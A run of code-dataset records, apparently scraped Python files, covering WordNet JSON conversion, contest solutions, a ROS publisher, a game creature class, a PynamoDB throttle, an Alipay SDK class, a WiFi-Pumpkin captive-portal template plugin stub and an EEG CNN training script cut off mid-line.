line.pop('w_cnt', None)\n line.pop('p_cnt', None)\n line.pop('sense_cnt', None)\n line.pop('tagsense_cnt', None)\n comma = ''\n if not is_first_line: \n comma = ','\n new_line = '\\n'\n #if not firstLine, change comma\n file_object.write(comma + new_line + json.dumps(line))\n\nprint('working...\\n')\n\n#Takes care of index and data files\nfor file_name in list(set(WN.META.index_files) | set(WN.META.data_files)):\n original_file_name = file_name\n new_file_name = original_file_name + '.json'\n print('parsing ' + file_name + ' to ' + new_file_name + '...')\n path = DIR + '/' + new_file_name\n os.makedirs(os.path.dirname(path), exist_ok=True)\n with open(path, 'w') as f:\n f.write('[')\n WN.for_each_line_of_file_do(WORDNET_DIR + '/' + original_file_name,\n WN.CallbackWrapper(to_json,\n original_file_name = original_file_name,\n file_object = f\n )\n )\n f.write(']')\n\n#Takes care of data files\n\n'''\n#Takes care of MultiLingual files\nlanguage = 'pt'\nfileName = 'wn-data-por.tab'\ncollectionName = language + '_' + replacePointWithUnderscore(fileName)\nclient[databaseName].drop_collection(collectionName)\nWN.forEachLineOfFileDo(fileName, WN.CallbackWrapper(to_json, fileName, collectionName))\n'''","sub_path":"dict_to_json.py","file_name":"dict_to_json.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"264588217","text":"n=int(input())\ndistance=[list(map(int,input().split())) for i in range(n)]\n\nimport itertools\nimport math\ntemp=[i for i in range(n)]\nperm=list(itertools.permutations(temp))\n\nsm=0\ncount=0\nfor route in perm:\n count+=1\n temp_dis=0\n route_list=list(route)\n for i in range(1,n):\n j=route_list[i]\n k=route_list[i-1]\n temp_dis+=math.sqrt((distance[j][0]-distance[k][0])**2+(distance[j][1]-distance[k][1])**2)\n sm+=temp_dis\nans=sm/count\nprint('{:.9f}'.format(ans))\n","sub_path":"ABC145/ABC145_C.py","file_name":"ABC145_C.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"63139627","text":"import multiprocessing\n\nbind = [\"0.0.0.0:8080\"] # 与nginx配置的端口一致\nchdir = \"/root/video/video_project/video\"\ntimeout = 30\nerrorlog = \"/root/video/blog/error.log\"\n#accesslog = \"/usr/fin/test_blog/project_name/logs/access.log\"\n#loglevel = 'debug'\nproc_name = 'video' # 工程名\n\nkeepalive = 6\ntimeout = 65\ngraceful_timeout = 10\nworker_connections = 100\n","sub_path":"video/video/gunicorn-config.py","file_name":"gunicorn-config.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645896106","text":"#To find the max difference between the higher indexed even integer and the lower indexed odd integer in a list.\n\ndef maxDifferenceOddEven(a):\n if len(a) < 1:\n return -1\n minodd=float(\"inf\")\n maxdif = -float(\"inf\")\n for i in range(len(a)):\n if(a[i]%2!=0):\n minodd = min(minodd, a[i])\n else:\n if minodd!=-float(\"inf\"):\n maxdif= max(maxdif, a[i]-minodd)\n if maxdif==-float(\"inf\"):\n return -1\n else:\n return maxdif\n","sub_path":"maxDifference.py","file_name":"maxDifference.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"128187447","text":"#! /usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import Twist \n\nrospy.init_node('topic_publisher')\n\npub = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\nrate = rospy.Rate(2)\ncount = Twist()\ncount.linear = 0\ncount.angular = 0 \n\nwhile not rospy.is_shutdown(): \n pub.publish(count)\n count.linear=0.5\n count.angular=0.5\n rate.sleep()","sub_path":"ros_basics_python/my_package/src/simple_topic_publisher.py","file_name":"simple_topic_publisher.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582475244","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 24 08:59:43 2017\n\n@author: itachi1793\n\"\"\"\n\nimport timeit\nimport math\n\nstart = timeit.default_timer()\n\nvalue = int(math.pow(2,1000))\nprint(value)\nv = [int(i) for i in str(value)]\ntot = 0\nfor i in v:\n tot += i\nprint(tot)\nstop = timeit.default_timer()\n\nprint(\"the program ran for \",stop - start)\n\n","sub_path":"Project-euler/euler_prblm16.py","file_name":"euler_prblm16.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"380488410","text":"import var\nfrom src.animation.animation_system import AnimationSystem\nfrom src.buff.buff import Buff\nfrom src.obj.building.trigger_building import TriggerBuilding\nfrom src.obj.entity.entity import Entity\nfrom src.tool.vector import Vector\n\"\"\"\nEvery creature has health, buff, damage, defense and animation_system.\nEvery creature can do attack or take damage.\n\"\"\"\n\n\nclass Creature(Entity):\n def __init__(self, rect, animation_system, speed_mag, max_health, defense, damage):\n \"\"\"\n :param rect: Rect\n :param animation_system: AnimationSystem\n :param speed_mag: float\n :param max_health: int\n :param defense: int\n :param damage: int\n \"\"\"\n super().__init__(rect, None, None, Vector(0, 0), speed_mag)\n self.max_health = max_health\n self.defense = defense\n self.damage = damage\n self.shoot_dir = Vector(1, 0)\n self.health = self.max_health\n self.animation_system = animation_system\n self.animation_system.play(\"stand_left\")\n # The counter for taking damage.\n self.__cnt_take_damage = 0\n # The minimum frames two damage taking.\n self.__interval_take_damage = 30\n # Buff of the creature.\n self.__buff = None\n\n @property\n def image(self):\n return self.__animation_system.image\n\n @image.setter\n def image(self, value):\n pass\n\n @property\n def vector(self):\n return self.__animation_system.vector\n\n @vector.setter\n def vector(self, value):\n pass\n\n @property\n def animation_system(self):\n return self.__animation_system\n\n @animation_system.setter\n def animation_system(self, value):\n if not isinstance(value, AnimationSystem):\n raise TypeError(\"Creature.animation_system must be AnimationSystem type.\")\n self.__animation_system = value\n\n @property\n def max_health(self):\n return self.__max_health\n\n @max_health.setter\n def max_health(self, value):\n value = int(value)\n if value < 0:\n raise ValueError(\"Creature.max_health can't be less than zero.\")\n self.__max_health = value\n\n @property\n def defense(self):\n return self.__defense\n\n @defense.setter\n def defense(self, value):\n value = int(value)\n if value < 0:\n raise ValueError(\"Creature.defense can't be less than zero.\")\n self.__defense = value\n\n @property\n def damage(self):\n return self.__damage\n\n @damage.setter\n def damage(self, value):\n self.__damage = int(value)\n\n @property\n def shoot_dir(self):\n return self.__shoot_dir\n\n @shoot_dir.setter\n def shoot_dir(self, value):\n self.__shoot_dir = Vector.init_one_arg(value).normalize()\n\n @property\n def health(self):\n return self.__health\n\n @health.setter\n def health(self, value):\n value = int(value)\n self.__health = min(max(value, 0), self.max_health)\n\n @property\n def buff(self):\n return self.__buff\n\n @buff.setter\n def buff(self, value):\n if value is not None and not isinstance(value, Buff):\n raise TypeError(\"Creature.buff must be Buff or None type.\")\n if value is not None and self.buff is not None:\n return\n self.__buff = value\n\n @property\n def is_dead(self):\n return self.health == 0\n\n @property\n def can_take_damage(self):\n return not self.is_dead and self.__cnt_take_damage >= self.__interval_take_damage\n\n def reset_take_damage(self):\n \"\"\"\n It should be called in all kinds of taking damage.\n :return:\n \"\"\"\n self.__cnt_take_damage = 0\n\n def update(self):\n # Update the buff.\n if self.buff is not None:\n self.buff.update()\n if self.buff.time == 0:\n self.buff.recover()\n self.buff = None\n # Update the counter for taking damage.\n self.__cnt_take_damage += 1\n # Move and attack\n self.move()\n self.attack()\n # Decide which animation to be played through the speed_dir and shoot_dir.\n if self.speed_dir.length == 0:\n if 0 <= self.shoot_dir.angle_to(Vector(0, 1)) < 180:\n self.__animation_system.play(\"stand_left\")\n else:\n self.__animation_system.play(\"stand_right\")\n elif 0 <= self.speed_dir.angle_to(Vector(0, 1)) < 180:\n self.__animation_system.play(\"move_left\")\n else:\n self.__animation_system.play(\"move_right\")\n # Update the animation system.\n self.__animation_system.update()\n # Is dead\n if self.is_dead:\n var.map.active_room.entities.remove(self)\n\n def attack(self):\n pass\n\n def take_bullet_damage(self, shootingbullet):\n if not self.can_take_damage:\n return\n damage = shootingbullet.damage\n if damage > 0:\n damage = max(damage - self.defense, 1)\n self.health -= damage\n # The bullet damage will cause creature move to the bullet direction.\n self.next_move = shootingbullet.speed_dir * 10\n self.reset_take_damage()\n try:\n var.map.active_room.entities.remove(shootingbullet)\n except ValueError:\n pass\n\n def take_creature_damage(self, creature):\n pass\n\n def take_damage(self, damage):\n \"\"\"\n Directly take damage, usually from the trap.\n :param damage: int\n :return:\n \"\"\"\n if self.can_take_damage:\n self.health -= damage\n self.reset_take_damage()\n\n def collide_building(self, *buildings):\n # A flag that check whether the entity can move finally like original move.\n # 标志实体最后能否像最开始那样移动\n can_access = True\n\n for building in buildings:\n # If the entity don't move, just skip.\n if self.delta_pos.length == 0:\n break\n # The building can't access and entity collide with it.\n if not building.can_access and self.rect.intersect(building.rect):\n\n # It can't move like original move.\n can_access = False\n\n # First cancel the move.\n delta_pos = self.delta_pos\n self.move(delta_pos * -1)\n\n # Try to move only in x or y direction, see if they still collide with building.\n # If it is, just set the corresponding direction move to zero.\n x, y = 1, 1\n # Try to move only in y direction.\n self.move((0, delta_pos[1]))\n if self.rect.intersect(building.rect):\n y = 0\n self.move((0, delta_pos[1] * -1))\n # Try to move only in x direction.\n self.move((delta_pos[0], 0))\n if self.rect.intersect(building.rect):\n x = 0\n self.move((delta_pos[0] * -1, 0))\n # Now move according to x and y.\n self.move((delta_pos[0] * x, delta_pos[1] * y))\n\n if isinstance(building, TriggerBuilding):\n building.on_trigger(self)\n # It process the special case for the collide.\n # Two rect has a overlapped corner.\n # In this case entity can move x or y direction without collide with the rect.\n # But if it move together, it will collide, cancel this move.\n if not can_access and self.delta_pos[0] != 0 and self.delta_pos[1] != 0:\n self.move(self.delta_pos * -1)\n self.move((0, 0))\n","sub_path":"src/obj/entity/creature/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"474549159","text":"\"\"\"create imdb for training net let origon imges for innput net sacle\"\"\"\nimport tensorflow as tf\nimport numpy as np\n#import skimage\nimport cv2\n#from easydict import EasyDict as edit\n\"\"\"\nedit has a dic in blob\n\"\"\"\ndef imglist_to_blob(img):\n \"\"\"convert a list of imges to a net input\"\"\"\n max_shape=np.array([im.shape for im in img]).max(axis=0) # get the max sacle\n num_imges=len(img)\n blob=np.zeros((num_imges,max_shape[0],max_shape[1],3),dtype=tf.float32)\n for i in range(num_imges):\n im=img[i]\n blob[i,0:max_shape[0],0:max_shape[1],:]=im\n return blob\n\ndef pre_imglist_for_blob(im,px_mean,target_size,max_size):\n \"\"\" prepare img for blob\"\"\"\n img=im.adtype(tf.float32,copy=False)\n im-=px_mean #减去平均像素\n im_shape=im.shape()\n im_size_min=np.min(im_shape[0:2])\n im_size_max=np.max(im_shape[0:2])\n im_sacle=(float)(target_size)/(float)(im_size_min)\n if np.round(im_sacle*im_size_max)>max_size:\n im_sacle=(float)(max_size)/(float)(im_size_max)\n im=cv2.resize(im,None,None,im_sacle,im_sacle,interpolation=cv2.INTER_LINEAR)\n return im,im_sacle\n","sub_path":"RCnn/tool/blob.py","file_name":"blob.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372987021","text":"'''\n48. 名詞から根へのパスの抽出\n文中のすべての名詞を含む文節に対し,その文節から構文木の根に至るパスを抽出せよ. ただし,構文木上のパスは以下の仕様を満たすものとする.\n\n各文節は(表層形の)形態素列で表現する\nパスの開始文節から終了文節に至るまで,各文節の表現を\"->\"で連結する\n「吾輩はここで始めて人間というものを見た」という文(neko.txt.cabochaの8文目)から,次のような出力が得られるはずである.\n\n吾輩は -> 見た\nここで -> 始めて -> 人間という -> ものを -> 見た\n人間という -> ものを -> 見た\nものを -> 見た\n'''\n\nfrom knock41 import load_cabocha_iter\n\n\ndef main():\n path = \"noun_to_root.txt\"\n count = 0\n with open(path, \"w\") as f:\n for chunks in load_cabocha_iter():\n for chunk in chunks:\n if chunk.dst == -1:\n continue\n if all(m.pos != \"名詞\" for m in chunk.morphs):\n continue\n f.write(chunk.normalized_surface())\n i = chunk.dst\n while i != -1:\n f.write(\" -> \" + chunks[i].normalized_surface())\n i = chunks[i].dst\n f.write(\"\\n\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Naoto/chapter05/knock48.py","file_name":"knock48.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628569261","text":"#!/usr/bin/env python\n\nimport re\nimport sys\nimport json\n\nclass Node(object):\n def __init__(self, name):\n self.name = name\n self.parents = set()\n self.children = set()\n\n def register_children(self, nodes):\n for node in nodes:\n self.children.add(node)\n node.parents.add(self)\n def __repr__(self):\n return self.__str__()\n def __str__(self):\n return \"Node[%s]\" % (self.name)\n\n\nn1 = Node('1')\nn2 = Node('2')\nn3 = Node('3')\nn4 = Node('4')\nn5 = Node('5')\nn6 = Node('6')\nn7 = Node('7')\nn8 = Node('8')\n\nn1.register_children([n2, n8])\nn2.register_children([n6])\nn3.register_children([n5, n7])\nn4.register_children([n5])\nn5.register_children([n3, n4])\nn6.register_children([n3])\nn7.register_children([n2])\nn8.register_children([n1, n5, n6])\nall_nodes = [n1, n2, n3, n4, n5, n6, n7, n8]\n\n# Array of path arrays\npaths = [(n,) for n in all_nodes]\n\nconnected_classes = {}\n\nfor node in all_nodes:\n # Can I get back to node? If so, which paths did I take?\n queue = [(child,) for child in node.children]\n while len(queue) > 0:\n current_path = queue.pop(0)\n if current_path[-1] == node:\n connected_classes[node] = set(current_path)\n break\n for child in current_path[-1].children:\n queue.append(tuple(list(current_path) + [child]))\n\nprint(connected_classes)\nmerged = None\nfor connected_class in connected_classes.values():\n if merged is None:\n merged = [connected_class]\n else:\n did_merge = False\n for m in merged:\n if len(m & connected_class) > 0:\n m |= connected_class\n did_merge = True\n break\n if not did_merge:\n merged.append(connected_class)\n\nprint(merged)\n","sub_path":"hw4/connected.py","file_name":"connected.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162853715","text":"from plugins.captivePortal.plugin import CaptiveTemplatePlugin\n\n\"\"\"\nDescription:\n This program is a core for wifi-pumpkin.py. file which includes functionality\n plugins for Pumpkin-Proxy.\n\nCopyright:\n Copyright (C) 2015-2016 Marcos Nesster P0cl4bs Team\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see \n\"\"\"\n\n\nclass ExampleTemplate(CaptiveTemplatePlugin):\n meta = {\n 'Name' : 'Example',\n 'Version' : '1.0',\n 'Description' : 'Example is a simple portal default page',\n 'Author' : 'Pumpkin-Dev',\n 'TemplatePath' : 'templates/Example',\n 'StaticPath' : 'templates/Example/static',\n 'Preview' : 'plugins/captivePortal/templates/Example/preview.png'\n }\n\n def __init__(self):\n for key,value in self.meta.items():\n self.__dict__[key] = value\n self.dict_domain = {}\n self.ConfigParser = True\n\n def init_language(self, lang):\n if (lang):\n if (lang.lower() != 'default'):\n self.TemplatePath = 'templates/Example/language/{}'.format(lang)\n return\n for key,value in self.meta.items():\n self.__dict__[key] = value \n \n","sub_path":"plugins/Example.py","file_name":"Example.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"225244345","text":"\"\"\"\nPynamoDB Throttling (Experimental)\n\"\"\"\nimport time\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass ThrottleBase(object):\n \"\"\"\n A class to provide a throttling API to the user\n \"\"\"\n\n def __init__(self, capacity, window=1200, initial_sleep=None):\n self.capacity = float(capacity)\n self.window = window\n self.records = []\n self.sleep_interval = initial_sleep if initial_sleep else 0.1\n\n def add_record(self, record):\n \"\"\"\n Adds a ConsumedCapacity record to the dataset over `window`\n \"\"\"\n if record is None:\n return\n self._slice_records()\n self.records.append({\"time\": time.time(), \"record\": record})\n\n def _slice_records(self):\n idx = 0\n now = time.time()\n for record in self.records:\n if now - record['time'] < self.window:\n break\n else:\n idx += 1\n self.records = self.records[idx:]\n\n def throttle(self):\n \"\"\"\n Sleeps for the appropriate period of time, based on the current data\n \"\"\"\n return\n\n\nclass NoThrottle(ThrottleBase):\n \"\"\"\n The default throttle class, does nothing\n \"\"\"\n\n def __init__(self):\n pass\n\n def add_record(self, record):\n pass\n\n\nclass Throttle(ThrottleBase):\n \"\"\"\n The default throttling\n\n This class will aggressively throttle API calls if the throughput for a given window is over\n the desired capacity.\n\n If the throughput is under the desired capacity, then API throttling will be reduced cautiously.\n \"\"\"\n\n def throttle(self):\n \"\"\"\n This uses a method similar to additive increase, multiplicative decrease\n\n # http://en.wikipedia.org/wiki/Additive_increase/multiplicative_decrease\n \"\"\"\n if not len(self.records) >= 2:\n return\n throughput = sum([value['record'] for value in self.records]) / float(time.time() - self.records[0]['time'])\n\n # Over capacity\n if throughput > self.capacity:\n self.sleep_interval *= 2\n # Under capacity\n elif throughput < (.9 * self.capacity) and self.sleep_interval > 0.1:\n self.sleep_interval -= self.sleep_interval * .10\n log.debug(\"Sleeping for %ss, current throughput is %s and desired throughput is %s\",\n self.sleep_interval, throughput, self.capacity)\n time.sleep(self.sleep_interval)\n","sub_path":"pynamodb/throttle.py","file_name":"throttle.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"210524557","text":"train.head()\nprint(\"Nulls in Oil columns: {0} => {1}\".format(oil.columns.values, oil.isnull().any().values))\nprint(\"=\"*70)\nprint(\"Nulls in holiday_events columns: {0} => {1}\".format(holiday_events.columns.values, holiday_events.isnull().any().values))\nprint(\"=\"*70)\nprint(\"Nulls in stores columns: {0} => {1}\".format(stores.columns.values, stores.isnull().any().values))\nprint(\"=\"*70)\nprint(\"Nulls in transactions columns: {0} => {1}\".format(transactions.columns.values, transactions.isnull().any().values))\n\noil.head(3)\nstores.head(3)\n\nplt.style.use('dark_background')\nplt.figure(figsize=(15, 12))\nstore_pivot = stores.dropna().pivot(\"store_nbr\", \"cluster\", \"store_nbr\")\nax = sns.heatmap(store_pivot, cmap='jet', annot=True, linewidths=0, linecolor='white')\nplt.title('Store numbers and the clusters they are assigned to')\n\nplt.style.use('seaborn-white')\ntype_cluster = stores.groupby(['type', 'cluster']).size()\ntype_cluster.unstack().plot(kind='bar', stacked=True, colormap= 'PuBu', figsize = (13, 11), grid=False)\nplt.title('Stacked Barplot of Store types and their cluster distribution', fontsize =18)\nplt.ylabel('Count of clusters in a particular store type', fontsize = 16)\nplt.show()\n\nplt.style.use('seaborn-white')\ncity_cluster = stores.groupby(['city', 'type']).store_nbr.size()\ncity_cluster.unstack().plot(kind='bar', stacked=True, colormap='virids', figsize=(13, 11), grid = False)\nplt.title('Stacked Barplot of Store types opened foreach city')\nplt.ylabel('Count of stores for a particular city')\nplt.show()\n\nholidary_events.head(3)\n\nplt.style.use('seaborn-dark')\nplt.style.use('dark_background')\nholiday_local_type = holiday_events.groupby(['locale_name', 'type']).size()\nholiday_local_type.unstack().plot(kind='bar', stacked=True, colormap= 'afmhot_r', figsize=(12, 10), grid=False)\nplt.title('Stacked Barplot of locale name against event type')\nplt.ylabel('Count of entries')\nplt.show()\n\nh = display(HTML(html_string))\nj = IPython.display.Javascript(js_string)\nIPython.display.dispaly_javascript(j)\n\nholiday_events.type.unique()\n\nprint(transactions.head(3))\nprint(\"=\"*60)\nprint(\"There are {0} rows and {1} columns in the transactions data\", format(transactions.shape[0], transactions.shape[1]))\n\nplt.style.use('seaborn-white')\nplt.figure(figsize=(13,11))\nplt.plot(transactions.date.values, transactions.transactions.values)\nplt.axvline(x='2015-12-23',color='red',alpha=0.3)\nplt.axvline(x='2016-12-23',color='red',alpha=0.3)\nplt.axvline(x='2014-12-23',color='red',alpha=0.3)\nplt.axvline(x='2013-12-23',color='red',alpha=0.3)\nplt.axvline(x='2013-05-12',color='green',alpha=0.2, linestyle= '--')\nplt.axvline(x='2015-05-10',color='green',alpha=0.2, linestyle= '--')\nplt.axvline(x='2016-05-08',color='green',alpha=0.2, linestyle= '--')\nplt.axvline(x='2014-05-11',color='green',alpha=0.2, linestyle= '--')\nplt.axvline(x='2017-05-14',color='green',alpha=0.2, linestyle= '--')\nplt.ylim(-50, 10000)\nplt.title(\"Distribution of transactions per day from 2013 till 2017\")\nplt.ylabel('transactions per day', fontsize= 16)\nplt.xlabel('Date', fontsize= 16)\nplt.show()\n\nitems.head()\n\nplt.style.use('seaborn-white')\nfam_perishable = items.groupby(['family', 'perishable']).size()\nfam_perishable.unstack().plot(kind='bar',stacked=True, colormap= 'coolwarm', figsize=(12,10), grid=False)\nplt.title('Stacked Barplot of locale name against event type')\nplt.ylabel('Count of entries')\nplt.show()\n\ntrain.head()\n\nplt.style.use('seaborn-deep')\nplt.figure(figsize=(13,11))\nplt.plot(train.date.values, train.unit_sales)\nplt.ylim(-50, 10000)\nplt.ylabel('transactions per day')\nplt.xlabel('Date')\nplt.show()\n\n\n\n","sub_path":"python_d3.py","file_name":"python_d3.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26694605","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass CallCenterTradeApplyParams(object):\n\n def __init__(self):\n self._broker_id = None\n self._buyer_name = None\n self._currency = None\n self._expire_time = None\n self._out_trade_no = None\n self._promo_params = None\n self._subject = None\n self._total_amount = None\n\n @property\n def broker_id(self):\n return self._broker_id\n\n @broker_id.setter\n def broker_id(self, value):\n self._broker_id = value\n @property\n def buyer_name(self):\n return self._buyer_name\n\n @buyer_name.setter\n def buyer_name(self, value):\n self._buyer_name = value\n @property\n def currency(self):\n return self._currency\n\n @currency.setter\n def currency(self, value):\n self._currency = value\n @property\n def expire_time(self):\n return self._expire_time\n\n @expire_time.setter\n def expire_time(self, value):\n self._expire_time = value\n @property\n def out_trade_no(self):\n return self._out_trade_no\n\n @out_trade_no.setter\n def out_trade_no(self, value):\n self._out_trade_no = value\n @property\n def promo_params(self):\n return self._promo_params\n\n @promo_params.setter\n def promo_params(self, value):\n self._promo_params = value\n @property\n def subject(self):\n return self._subject\n\n @subject.setter\n def subject(self, value):\n self._subject = value\n @property\n def total_amount(self):\n return self._total_amount\n\n @total_amount.setter\n def total_amount(self, value):\n self._total_amount = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.broker_id:\n if hasattr(self.broker_id, 'to_alipay_dict'):\n params['broker_id'] = self.broker_id.to_alipay_dict()\n else:\n params['broker_id'] = self.broker_id\n if self.buyer_name:\n if hasattr(self.buyer_name, 'to_alipay_dict'):\n params['buyer_name'] = self.buyer_name.to_alipay_dict()\n else:\n params['buyer_name'] = self.buyer_name\n if self.currency:\n if hasattr(self.currency, 'to_alipay_dict'):\n params['currency'] = self.currency.to_alipay_dict()\n else:\n params['currency'] = self.currency\n if self.expire_time:\n if hasattr(self.expire_time, 'to_alipay_dict'):\n params['expire_time'] = self.expire_time.to_alipay_dict()\n else:\n params['expire_time'] = self.expire_time\n if self.out_trade_no:\n if hasattr(self.out_trade_no, 'to_alipay_dict'):\n params['out_trade_no'] = self.out_trade_no.to_alipay_dict()\n else:\n params['out_trade_no'] = self.out_trade_no\n if self.promo_params:\n if hasattr(self.promo_params, 'to_alipay_dict'):\n params['promo_params'] = self.promo_params.to_alipay_dict()\n else:\n params['promo_params'] = self.promo_params\n if self.subject:\n if hasattr(self.subject, 'to_alipay_dict'):\n params['subject'] = self.subject.to_alipay_dict()\n else:\n params['subject'] = self.subject\n if self.total_amount:\n if hasattr(self.total_amount, 'to_alipay_dict'):\n params['total_amount'] = self.total_amount.to_alipay_dict()\n else:\n params['total_amount'] = self.total_amount\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = CallCenterTradeApplyParams()\n if 'broker_id' in d:\n o.broker_id = d['broker_id']\n if 'buyer_name' in d:\n o.buyer_name = d['buyer_name']\n if 'currency' in d:\n o.currency = d['currency']\n if 'expire_time' in d:\n o.expire_time = d['expire_time']\n if 'out_trade_no' in d:\n o.out_trade_no = d['out_trade_no']\n if 'promo_params' in d:\n o.promo_params = d['promo_params']\n if 'subject' in d:\n o.subject = d['subject']\n if 'total_amount' in d:\n o.total_amount = d['total_amount']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/CallCenterTradeApplyParams.py","file_name":"CallCenterTradeApplyParams.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252264316","text":"import pandas as pd\n# path ='unet_1_channels_old.csv'\npath ='multi_1_channels.csv'\n# path ='multiresunet_5_channels.csv'\n# path ='multiresunet_3_channels.csv'\n# path ='dunet_3_good.csv'\n# path ='nestnet_1_channels.csv'\n# path ='nestnet_3_channels.csv'\n# result = pd.read_csv(path, sep=\",\", usecols=(0,1,2, 3, 4, 5, 7, 8,9))# , header=None\nresult = pd.read_csv(path, sep=\",\", usecols=(0,1,2, 3, 4, 5, 6, 7, 8))# , header=None\n# result = pd.read_csv(path, sep=\",\", usecols=(0,1,2, 3, 4, 5, 6, 7))# , header=None\nresult = result.round({'Mean IoU': 3, 'Dropout': 3, 'Elastic proportion': 3})\nresult['Learning rate'] = result['Learning rate'].map('{:.3e}'.format)\n# result['Whitening'] = result['Whitening'].map('{:.3e}'.format)\n\nif __name__ == '__main__':\n print(result.to_latex(index=False))\n","sub_path":"results/hyper_opt/rounding.py","file_name":"rounding.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"274770015","text":"import numpy as np\nimport os\nfrom data_processing.general_processor import Utils\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler # Usare MIn MAx scaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import minmax_scale\nimport tensorflow as tf\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\nassert len(physical_devices) > 0, \"Not enough GPU hardware devices available\"\nconfig = tf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n#############################################################################\n\n\nexclude = [38, 88, 89, 92, 100, 104]\nsubjects = [n for n in np.arange(1,109) if n not in exclude]\ndata_path = \"D:\\\\datasets\\\\eeg_dataset\\\\C3_C4_sub_no_base\" #save_path = \"D:\\\\datasets\\\\eeg_dataset\\\\C3_C4_sub_no_base_min1_max3\" \"D:\\\\datasets\\\\eeg_dataset\\\\C3_C4_sub_no_base\"\nxs, ys = Utils.load_sub_by_sub(subjects, data_path)\nxs, ys = Utils.scale_sub_by_sub(xs, ys)\n\n# Questo fa una modifica alle label aggiungendo il nome del sogetto in modo da stratificare\nnew_y = list()\nfor x, y, index_sub in zip(xs, ys, range(len(xs))):\n subj_array = list()\n for index_label, label in enumerate(y):\n subj_array.append(label + str(index_sub))\n new_y.append(np.array(subj_array))\ny = np.concatenate(new_y)\nx = np.concatenate(xs)\n\n#Qui faccio un reshape\nx_resh = x.reshape(x.shape[0], x.shape[2]*x.shape[1])\n#Statifico per soggetto ed esempi -> Proporzione perfetta tra soggetti e combinazioni di task in x_test\nx_train, x_test, y_train, y_test = train_test_split(x_resh, y, stratify =y, test_size=0.30, random_state=17)\n\n#Processing y\ny_train = Utils.to_numerical(y_train, by_sub=True)\ny_test = Utils.to_numerical(y_test, by_sub=True)\n\n#Reshape x -> (sample, width, height, channels)\nx_train_resh = x_train.reshape(x_train.shape[0], int(x_train.shape[1]/2), 2, 1).astype(np.float64)\nx_test_resh = x_test.reshape(x_test.shape[0], int(x_train.shape[1]/2), 2, 1).astype(np.float64)\n\n# #Test rehsape\n# plt.subplot(2,2,1, title=\"x_train_before\")\n# plt.plot(x_train[0][:640], color=\"red\")\n# plt.subplot(2,2,2, title=\"x_train_before\")\n# plt.plot(x_train[0][640:], color=\"red\")\n# plt.subplot(2,2,3, title=\"x_train_resh_after\")\n# plt.plot(x_train_resh[0][0].T, color=\"blue\")\n# plt.subplot(2,3,4, title=\"x_train_resh_after\")\n# plt.plot(x_train_resh[0][1].T, color=\"blue\")\n# plt.show()\n\ny_train = tf.keras.utils.to_categorical(y_train)\ny_test = tf.keras.utils.to_categorical(y_test)\n\n#%%\n#Convolution Neural Network\n# [samples, time steps, features].\n# real_x_train = x_train.reshape(14808, 640, 2)\n# real_x_test = x_test.reshape(3703, 640, 2)\nlearning_rate = 1e-3 # default 1e-3\ndrop_rate = 0.3\n\nloss = tf.keras.losses.categorical_crossentropy #tf.keras.losses.categorical_crossentropy\noptimizer = tf.keras.optimizers.Adam(lr=learning_rate) #tf.keras.optimizers.Adam(lr=learning_rate) tf.keras.optimizers.SGD(learning_rate=learning_rate)\n\nmodel 